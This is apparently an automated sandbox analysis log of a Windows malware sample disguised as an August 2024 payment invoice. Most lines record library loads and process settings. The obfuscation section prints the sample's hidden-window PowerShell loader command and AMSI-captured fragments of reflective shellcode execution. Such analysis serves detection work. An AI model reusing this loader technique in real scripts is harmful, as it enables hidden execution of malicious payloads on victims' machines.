            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: PAGO FRAS. AGOSTO 2024..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: em.Core.pdbFp3 source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.1875277086.0000000009583000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Eldreven $Paddehattens $Filtilgange), (Aruspex @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:stamina = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Intrabiontic)), $Korfitzs).DefineDynamicModule($Retmaessig, $false).DefineType($Vulcanize, $Compulsiveness, [System.MulticastDelegate]
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07A359FB push ebp; retf 1_2_07A359FC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07A3ED60 pushfd ; ret 1_2_07A3ED61
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09453548 push 8BD38B50h; iretd 1_2_0945354E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
